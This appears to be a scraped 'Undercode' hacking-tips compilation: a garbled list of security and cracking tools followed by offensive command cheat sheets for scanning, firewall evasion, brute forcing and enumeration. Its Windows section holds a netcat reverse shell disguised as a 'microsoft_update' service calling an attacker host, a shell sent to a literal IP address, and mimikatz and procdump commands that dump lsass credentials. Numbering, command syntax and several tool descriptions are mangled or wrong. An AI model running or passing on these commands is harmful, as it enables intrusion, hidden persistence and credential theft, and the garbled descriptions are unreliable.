19) THC Amap

It can detect what program is listening on a certain port. Because of its unique version detection feature, its database will not become as large as Nmap. You can consider using it when Nmap detects a service failure or other software does not work. Another feature of Amap is its ability to parse Nmap output files. This is another valuable tool contributed by THC.

20) The three main problems of GFI LANguard enterprise network vulnerability management: network scanning, network audit and patch management. GFI LANguard Network Security Scanner (NSS) is an award-winning solution that scans, detects, evaluates and repairs any security vulnerabilities in the network. As an administrator, you often need to deal with various issues, and sometimes use multiple products to deal with issues related to network vulnerabilities, patch management, and network audits. With GFI LANguard NSS, the three major issues of vulnerability management can be solved through a single control panel with rich reporting capabilities.

21) Aircrack
Aircrack is a set of tools for cracking 8WEP and WPA, generally used for key cracking of wireless networks, thereby illegally entering unauthorized wireless networks. As long as enough encrypted data packets are collected, it can be used to crack the WEP key of 40 to 512 bits, and can also crack the WPA1 or 2 network through advanced encryption methods or brute force cracking.

22) Superscan
SuperScan is a free tool developed by Foundstone, but a very powerful tool. Compared with many similar tools, it is both a hacking tool and a network security tool. A hacker can use its denial of service attack (DoS, denial of service) to collect remote network host information. As a security tool, SuperScan can help you discover weaknesses in your network.
Two, three, Netfilter

🦑 In layman's terms, the architecture of netfilter is to place some detection points (HOOK) at several positions in the entire network process, and register some processing functions on each detection point for processing (such as packet filtering, NAT, etc., or even User-defined functions).
Twenty-four, Sysinternals

Sysinternals belongs to a set of security management suites, mainly including:

(1) Process Explorer: process management tool, can be set to completely replace the system's own task manager taskmgr, become the default "task manager". The various monitors inside monitor or record the current state of the system very intuitively, and the ease of use is very high. Support XP and Win2003 above systems.

(2) PsTools: It consists of 12 commands in total and can be used to remotely manage Windows NT / 2000 / XP systems. You can remotely organize the hard disk, close the messenger service running on the remote computer, view the server hard disk space, view the process on the remote computer, and end the suspicious process, send messages, and quickly shut down the remote computer.

(3) Autoruns: powerful and complete startup item scanning tool!

(4) TCPView: Port detection software, very small and easy to use.

(5) RootkitRevealer: It can be used to detect whether the rootkit is running in the Windows system of the system. It can detect all rootkits published by www.rootkit.com , including AFX, Vanquish, HackerDefender, etc. by analyzing the differences between the registry and system API files Note: RootkitRevealer cannot detect rootkits without hidden files and registry, such as FU_Rootkit).

25) Retina
Retina has been regarded as the most accurate non-embedded network security scanner in the industry. It contains the most comprehensive security vulnerability database maintained by eEye's research and development team. As a professional security software for both distributed enterprise users and users in a stand-alone network environment, Retina has been used by many of the world's largest companies and government departments. They are used to detect the network security of various branches / head offices / government departments, and correct hidden vulnerabilities and insecure settings in the network.

27) Perl / Python / Ruby
perl is older than ruby ​​or python. Perl was once the most popular scripting language, and was once considered a must for hackers. You can complete complex data processing with just a few lines, and the speed does not have to be much slower. The built-in support for regular expressions and data structures is even more amazing. Many websites used to be written in perl. Even now, some older foreign websites still have some perl codes. The most powerful thing about perl is that it has countless library support. However, perl has the largest community in the world, and you can find the corresponding library for anything you want. But the shortcomings of perl are also obvious: perl's program is too flexible, there are usually many solutions to a problem, just as there are many sayings in one sentence, and the syntax of perl is completely heavenly for people who are not familiar with it. . Ruby and Python both appeared as replacements for perl. The latest perl adds object-oriented support, and ruby ​​and python have better object-oriented support (even better than java).

27) L0phtcrack
L0phtCrack v5.04, referred to as LC 5, is an essential tool for network administrators. It can be used to detect whether Windows and UNIX users have used unsafe passwords. Win NT / 2000 / XP / UNIX administrator account password cracking tool. Facts have proved that simple or easily cracked administrator passwords are one of the biggest security threats, because attackers often log on to computer systems as legitimate without being noticed.

28) Scapy
Scapy is a powerful interactive packet processing tool, packet generator, network scanner, network discovery tool and packet sniffer tool. It provides a variety of functions for interactively generating data packets or data packet collections, manipulating data packets, sending data packets, packet sniffing, response and feedback matching, and so on.
Twenty-nine, Sam Spade
SamSpade provides a friendly GUI interface, can easily complete a variety of network query tasks, it was originally developed to track down spammers, but can also be used for a large number of other network detection, network management Security-related tasks, including ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search and other tools, is an integrated toolbox

30) GnuPG / PGP
With the development of network and computer technology, the security of data storage and data exchange has become more and more important, and encryption technology has been used for data storage and data exchange for a long time. In order to ensure the correctness of the two parties' identity during network data exchange, the visa system has also matured. GnuPG is a set of tools for encrypting data and making certificates. Its function is similar to PGP. But PGP uses many patented algorithms.

31)
The Airsnort program uses the shortcomings of the widely used network encryption system "Wi-fi" (or 802.11b) designed according to general standards to enter the network, but another encryption system has not been broken by AirSnort or WEPCrack . The people who designed AirSnort believe that many Internet users do not value or cannot understand the flaws in the Wi-fi encryption system.

32) BackTrack
BackTrack is a self-starting CD based on Slackware and SLAX. It contains a set of security and computer forensics tools. It was actually created by the fusion of Auditor Security Linux and WHAX (formerly Whoppix).
33. P0f
p0f is another passive discrimination tool for remote operating systems after Nmap and Xprobe2. It supports: reverse connection SYN mode, forward connection SYN + ACK mode, empty connection RST + mode, fragmentation ACK mode. It can also detect: whether it is running behind a firewall, whether it is running in NAT mode, whether it is running in load balancing mode, the time the remote system has started, the DSL and ISP information of the remote system, etc.


34) Google: a popular search engine.

35) WebScarab is
a proxy software including proxy, web crawling, web spider, session analysis, automatic script interface, fuzzing tool, encoding / decoding of all popular formats, service description language and parser.


36) Ntop
NTOP can associate the port usage with the application, which is similar to the "netstat -an" command, and can display detailed information such as port opening time and port traffic. For example, you can associate the open TCP / UDP port with the application program.

37) Tripwire
is currently the most famous software tool for file system integrity check under unix. The core of the technology used in this software is to generate a digital signature for each file to be monitored and keep it. When the current digital signature of the file is inconsistent with the retained digital signature, then the file must have been modified now.

38) Ngrep
rep is an online version of grep (a tool to search for strings in text), and strives for more grep features to search for specified packets. Because libpcap library is required to install ngrep, it supports a large number of operating systems and network protocols. Can identify TCP, UDP and ICMP packets, understand the filtering mechanism of bpf.

39) Nbtscan is
a small tool to scan the NetBIOS information of WINDOWS network, but it can only be used in the local area network, it can display IP, host name, user name and MAC address and so on.

40 ) WebInspect
is considered to be the next-generation Web application security testing tool. The main functions are introduced: (1) use innovative evaluation technology to check the security of Web services and Web applications; Evaluation; (3) Perform application security testing and collaboration throughout the lifecycle; (4) Easily run interactive scans through the most advanced user interface; (5) Use advanced tools (HP Security Toolkit) to perform penetration tests; (6 ) Configured to support any web application environment.

41) OpenSSL
SSL is the abbreviation of Secure Socket Layer (Secure Socket Layer Protocol) and can provide secret transmission on the Internet. The entire OpenSSL software package can be divided into three main functional parts: cryptographic algorithm library, SSL protocol library and application program.

🦑No one allowed to clone our tutorials

42) Xprobe2
Xprobe2 actively detects the characteristics of the ICMP datagram corresponding to the datagram through fuzzy matrix statistical analysis, and then detects the type of the remote operating system.

43() EtherApe
The network sniffer can perform the same functions as Tcpdump, but the operationwritten by undercode interface is much more friendly. Both Ehtereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many ways (for example, they use the same filtering rules and keywords). Ethereal uses the same as other graphical network sniffer.
Fourth, Core Impact is
recognized as the strongest vulnerability detection tool, comprehensive assessment and detection, prevention and response to information security threats. By safely replicating real-world attacks on network servers and workstations, end-user systems, and web applications, you can assist in finding and fixing security issues.

45) IDA Pro
is an interactive "analyst". However, it does not automatically solve problems. IDA Pro will find suspicious instructions and will not solve these problems. Your job is to inform IDA how to do it.

46) ​​SolarWinds is
a professional network management software that can monitor and discover network devices. The following tools are included:

1) Network Performance Monitoring: Bandwidth measurement, routing CPU load, bandwidth monitoring, CPU measurement, network performance monitor, SNMP image and advanced CPU upload.

2) Network Discovery: List of subnets, Ping Sweep, and IP web browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning

3) Tools for Cisco networks: IP web browser, routing CPU load, configuration download, configuration upload, configuration editor / browser, proxy ping, comparative running VS startup configuration, router password encryption, CPU measurement And advanced CPU upload

4) Network monitoring: Watch It !, network monitor, Syslog server, routing CPU load, advanced ping and network performance monitor.

5) IP Address Management: Advanced subnet calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS verification, IP address management, Ping Sweep.

6) Security (Security): routing security check, TCP Reset, dictionary editor, SNMP Brute Force attack, SNMP dictionary attack, router password encryption.

7) Ping & Diagnostic: ping, advanced ping, Trace Route, Proxy Ping, Ping Sweep.

8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB browser and SNMP images.

9) Others: TFTP server, WAN Killer, Wake-On-Line.

47) Pwdump: a tool for grabbing password files of Windows users.
Forty-eight, LSoF
full name list opened files, which is to list the files that have been opened in the system. We know that everything in the Linux environment is a file, the device is a file, the directory is a file, and even sockets are files. Therefore, using the lsof command is very helpful for daily Linux management.

49) RainbowCrack is
a multi-functional password cracking software, which not only can crack passwords, but also is a cracking tool for messy algorithm encryption. For example, it can crack im, md5, sha1, customizable, etc., other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the forms generated on one system can be directly converted to another system for use. Although it is powerful, it is more complicated to use.


50) Firewalk
Linux network security tools use similar traceroute technology to analyze IP packet responses to determine gateway access control lists and tools for drawing network graphs.


51) An
easy-to-use IP and port scanning tool for Angry IP Scanner , which can obtain the ping response time, host name, computer name, workgroup, login user name, MAC address, TTL, NetBios information of the scanned computer, etc. You can specify the scan port to view the open port of the target computer; for the active host, you can perform operations such as opening in the resource manager, browsing with a web browser, FTP, telnet, ping, tracert or using the web page to find the geographic location of the specified IP . With just a web address or host name, Angry IP Scanner can automatically resolve its IP address and scan it. Angry IP Scanner also supports automatic selection and scanning of entire Class B and Class C IP segments, collection and management of commonly used IPs, and export of scan results to multiple file formats. Due to the multi-threaded scanning, Angry IP Scanner can scan dozens of IPs at the same time, so it is extremely fast.


52) RKHunter's
Chinese name "Rootkit Hunter" can find about 58 known rootkits and some sniffer and backdoor programs. It performs a series of test scripts to confirm whether the machine has been infected with rootkits.


53) Ike-scan is
a tool for detecting the transmission characteristics of IKE (Internet Key Exchange) service. IKE is a mechanism for establishing a connection between a server and a remote client in a VPN network. After the IP address of the VPN server is scanned, the reconstructed IKE data packet is distributed to each host in the VPN network. As long as the host running IKE will send back feedback to confirm its existence. The tool then records and displays these feedback packets and compares them with a series of known VPN product fingerprints.


54) Arpwatch
ARP (Address Resolution Protocol) is a protocol used to resolve IP and hardware addresses of network devices. Under Linux system, arpwatch can monitor and record ARP packets in the regional network, and report the monitored changes through E-mail.


55) KisMAC is
a free wireless protocol sniffing program that can be used in Mac OX operating system. The KisMAC application does not securely change file permissions during installation. Local attackers can use this vulnerability to gain unauthorized access to sensitive file information.

56) OSSEC HIDS is
an open source intrusion detection system, including log analysis, comprehensive detection, rook-kit detection. As a HIDS, OSSEC should be installed in a monitoring system. In addition, sometimes it is not necessary to install the full version of OSSEC. If multiple computers are installed with OSSEC, you can use the client / server mode to run. The client sends the data back to the server for analysis through the client program. Monitoring multiple systems on one computer is quite economical and practical for business or home users. The biggest advantage of OSSEC is that it can run on almost any operating system, such as Windows, Linux, OpenBSD / FreeBSD and MacOS. However, clients running on Windows cannot implement root-kit detection, and clients on other systems have no problems.


57) Openbsd PF
OpenBSD users love to use PF, which is their firewall tool. Functions include network address translation, management of TCP / IP communications, bandwidth control, and packet grading control. It also has some additional features, such as passive operating system detection. PF was written by the same people who wrote OpenBSD, and it has been well evaluated, designed, and coded to avoid exposing similar vulnerabilities in other packet filters.


58) Nemesis: It can be used to construct almost any type of ICMP packet.


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 57 MOST DANGEROUS TOOLS TESTED- Use for secure not for harm 👿

#SUPPORT & SHARE

T.me/UndercodeTesting

🦑 Collection of practical skills of penetration testing Fast tips @undercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best NMAP scanning strategy


# The best nmap scanning strategy for all sizes of networks # Host discovery, generating a list of live hosts $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24


> $ grep "Status: Up" Discovery. gnmap | cut -f 2 -d '' > LiveHosts.txt # Port discovery, found most commonly used ports # https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4- Pn -oG TopTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

> $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # port discovery , Found all ports, but the scanning of UDP ports will be very slow $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt

> $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Display TCP \ UDP port $ grep"open" FullTCP | cut -f 1 -d '' | sort -nu | cut -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "T:" $ 0} ' $ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d ' / ' | xargs | sed ' s / /, / g ' | awk ' {print "U: "$ 0} '

# Detect service version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Scan system scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # System and service Detect $ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts. txt

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Nmap Perform web vulnerability scanning
fb.com/undercodeTesting


> cd / usr / share / nmap / scripts /

> wget https://nmap down> from git or site

> nmap_nse_vulscan-2.0.tar.gz&& tar xzf nmap_nse_vulscan-2.0.tar.gz

> nmap -sS -sV --script = vulscan / vulscan.nse target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv target

> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv -p80 target

> nmap -PN -sS -sV --script = vulscan --script-args vulscancorrelation = 1 -p80 target

> nmap -sV --script = vuln target
nmap -PN -sS -sV --script = all --script-args vulscancorrelation = 1 target


🦑 use DIRB blasting directory

Note: DIRB is a tool dedicated to blasting directories, which has been installed by default in Kali, Similar tools include foreign patator , dirsearch , DirBuster , domestic sword and so on.

> dirb http: / / IP: PORT / usr/ share / dirb / wordlists / common .txt

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Nmap – avoid firewall :

# segment

> $ nmap -f# Modify the default MTU size, but it must be a multiple of 8 (8, 16, 24, 32, etc.)

> $ nmap --mtu 24 # Generate a random amount of spoofing

> $ nmap -D RND: 10 [target] # Manually specify the use of spoofing IP

> $ nmap -D decoy1, decoy2, decoy3 etc. # botnet scan, first need to find the botnet's IP

> $ nmap -sI [Zombie IP] [Target IP] # specify the source port number $ nmap --source-port 80 IP # Append a random amount of data after each scanned data packet

> $ nmap --data-length 25 IP # MAC address spoofing can generate MAC addresses of different hosts $ nmap --spoof-mac Dell / Apple / 3 Com IP

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 nmap Pratical tips by Undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑More Pratical hacking tips by undercode:
t.me/undercodeTesting


🦑 Patator – all-around brute force testing tool


# git clone https://github.com/lanjelot/patator.git / usr / share / patator # SMTP blast

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst
$ patator smtp_login host = 192.168 . 17.129 user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host =192.168 . 17.129 helo = 'ehlo 192.168.17.128' user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst

$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst -x ignore: fgrep = 'incorrect password or account name'


🦑 Use Fierce to blast DNS

Note: Fierce will check whether the DNS server allows zone transfer. If allowed, zone transfer will be performed and the user will be notified. If not allowed, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute andSubBrute etc.

# https://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt


use Nikto scan Web Services


Nikto - C all -h https: // IPScan


🦑WordPress


git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p


🦑HTTP fingerprint recognition


wget http: / /www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301 / linux / ./httprint -h http: // IP -s signatures.txt


scan with Skipfish

Note: Skipfish is a web application security investigation tool. Skipfish will use recursive crawlers and dictionary-based probes to generate an interactive website map. The resulting map will be output after passing security checks.

skipfish -m 5 -LY -S / usr / share / skipfish / dictionaries / complete.wl -o ./skipfish2 -u http: // IP


🦑uses NC to scan


nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56. $ I 21-25 -z; done


🦑Unicornscan

Note: Unicornscan is a tool for information collection and security audit.

us -H -msf -Iv 192 .168 .56 .101 -p 1 -65535 us -H -mU -Iv 192 .168 .56 .101 -p . 1 -65535 -H resolve the host name in the report generation stage -m scan type ( SF - TCP , the U- - UDP ) -Iv - detail


using the operating system fingerprint identification Xprobe2


Xprobe2 -v - p tcp : 80 : open IP


🦑enumeration Samba


nmblookup -A target
smbclient // MOUNT / share -I target -N rpcclient -U "" target
enum4linux target


🦑enumeration SNMP


snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP


practical Windows cmd command


net localgroup Users
net localgroup Administrators
search dir / s * .doc system ( "start cmd.exe / k $ cmd" )
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe" start = auto error = ignore
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92 . 17.103 7779 mimikatz.exe "privilege :: debug" "log" "sekurlsa :: logonpasswords"Procdump.exe -accepteula- ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa :: minidump lsass.dmp" "log" "sekurlsa :: logonpasswords" C: \ temp \ procdump.exe -accepteula- ma lsass.exe lsass .dmp 32 -bit system
C: \ temp \ procdump.exe -accepteula- 64 - ma lsass.exe lsass.dmp 64 -bit system


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 you can get last hackers & Undercode news on: twitter.com/UndercodeNews 😉

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What about hijack wifi ?


1) Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc.

2) Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.

3) This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. At present, only a few devices meet the requirements, so you may need to use custom firmware.

4) Nexus 5 and other devices that use the BCM4399 chip can install Nexmon [ download address ], and devices that use the BCM4300 chip can choose to install bcmon [ download address ].
Note: The device needs Root to use the tool


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 let s send some social media tracking tips :